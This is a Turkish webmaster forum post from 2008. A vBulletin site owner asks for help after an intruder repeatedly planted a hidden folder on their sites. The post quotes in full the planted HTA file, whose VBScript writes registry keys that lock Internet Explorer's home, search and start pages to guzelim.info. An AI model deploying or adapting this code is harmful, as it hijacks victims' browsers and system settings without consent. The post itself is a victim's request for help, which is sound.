Google Fan Webmaster Forum - Tekil Mesaj Gösterimi - Lütfen Yadım :(
Tekil Mesaj Gösterimi
  #1 (permalink)  
Eski 01-05-2008, 17:16:30
NoNeTheLeSs - ait Avatar
NoNeTheLeSs NoNeTheLeSs isimli üyemiz çevrimdışıdır. (Offline)
 
Konya Şubesi
Nerden: Gelin Nere Giden Kara Kız =) .
Mesajlar: 284
Thanks: 0
Thanked 0 Times in 0 Posts
iTrader Puanı: (48)
iTrader Feedback: (100%)
Rep puanı: 30
NoNeTheLeSs isimli üyemiz hakkına hiçbir bilgimiz yok.
Tanımlı Lütfen Yadım :(

Arkadaslar Forum Sistemi Kurulu (vbulletin) Bir Kaç Siteme
clientscript dosya klasörünün içine yui diye bir klasör atılmış
Daha Sonra Bu Dosyaları Silmeme Rağmen Dosyaları Atan Adam Aynı Şekilde Dosyaları Gene Yerleştirmiş Ama Dosyaların Nerede Oldugunu Bulamadım
Attıgı Dosyalar Internet Explorer Başlangıç Sayfasını guzelim.info diye bir adrese değiştirilememek üzere ayarlıyor.

Lütfen yardım edin arkadaşlar.


Klasörün içerisinde şu dosyalar var


hits.html application dosyasının içerisindede şu kodlar mevcut
ana sayfayı guzelim.info diye bir site yaptırtıyor.
Code:
<html><head>
<hta:application id=hta_note_id
 applicationName=hta_note_name
 showInTaskBar=no
 caption=no
 innerBorder=no
 selection=no
 scroll=no
 contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
  shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
  shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
  shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.guzelim.info","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.guzelim.info","REG_SZ"
self.Close
</SCRIPT>
</head>
</body>
</html>
Alıntı ile Cevapla
Text Reklamlar